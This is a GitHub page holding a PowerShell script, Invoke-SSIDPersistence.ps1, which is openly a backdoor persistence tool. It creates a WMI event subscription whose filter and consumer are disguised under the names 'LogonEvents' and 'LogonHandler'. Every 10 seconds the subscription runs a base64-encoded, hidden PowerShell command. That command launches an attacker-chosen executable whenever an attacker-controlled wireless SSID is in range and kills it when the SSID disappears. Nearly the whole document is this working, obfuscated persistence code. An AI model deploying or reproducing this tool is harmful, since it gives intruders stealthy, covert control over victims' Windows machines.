-
Notifications
You must be signed in to change notification settings - Fork 0
/
Invoke-SSIDPersistence.ps1
62 lines (49 loc) · 2.94 KB
/
Invoke-SSIDPersistence.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
<#
.SYNOPSIS
WMI binding Function that continually monitors the air for a SSID which you specify as a backdoor trigger. If you have something within range of
the target to omit wireless signals with a given "evil ap" SSID, it'll execute a binary and keep it open until which time
the wireless signal disappears.
.DESCRIPTION
WMI binding Function that continually monitors the air for a SSID which you specify as a backdoor trigger. If you have something within range of
the target to omit wireless signals with a given "evil ap" SSID, it'll execute a binary and keep it open until which time
the wireless signal disappears.
.EXAMPLE
PS> Invoke-SSIDPersistence -NetworkName "3v1ln3tw0rk" -EXEPath "c:\windows\system32\evil.exe" -FilterName "evilap" -ConsumerName "evilconsumer"
This will check the air every 10 seconds for a SSID called "3v1ln3tw0rk" and execute evil.exe while the network exists.
The idea came from: http://www.irongeek.com/i.php?page=videos/bsideslasvegas2015/atgp06-wi-door-bindrev-shells-for-your-wi-fi-vivek-ramachandran
#>
function Invoke-SSIDPersistence
{
Param(
[Parameter(Mandatory=$true)]
[string]$NetworkName,
[Parameter(Mandatory=$true)]
[string]$EXEPath,
[string]$FilterName = "NewEventFilter",
[string]$ConsumerName = "NewConsumer"
)
$cmd = @"
`$NetworkName = `'$NetworkName`'
`$EXEPath = `'$EXEPath`'
`$x = (netsh wlan show networks mode=Bssid | Select-String -Pattern "^SSID [0-9]{1,3} : " | % { `$_.ToString().Split(":")[1].trim() }).split("``r``n",[System.StringSplitOptions]::RemoveEmptyEntries)
`$filename = Split-Path `$EXEPath -Leaf
if (`$x -contains `$NetworkName) {
if (-not ((Get-Process).Path -contains `$EXEPath)) {
Start-Process `$EXEPath -WindowStyle Hidden
}
} else {
Get-Process | where-object { `$_.Path -eq `$EXEPath } | stop-process -force
}
"@
$bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
$encodedString = [Convert]::ToBase64String($bytes)
#[system.text.encoding]::unicode.getstring([system.convert]::FromBase64String($encodedString))
$filterName = 'LogonEvents'
$consumerName = 'LogonHandler'
$Query = "Select * From __InstanceModificationEvent Where TargetInstance Isa 'Win32_LocalTime' And TargetInstance.Second LIKE '%5'"
$psexe = 'powershell.exe'
$psargs = "-noprofile -nologo -win hidden -enc $encodedString"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$FilterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Argument @{Name=$ConsumerName;ExecutablePath=$psexe;CommandLineTemplate=$psargs}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
}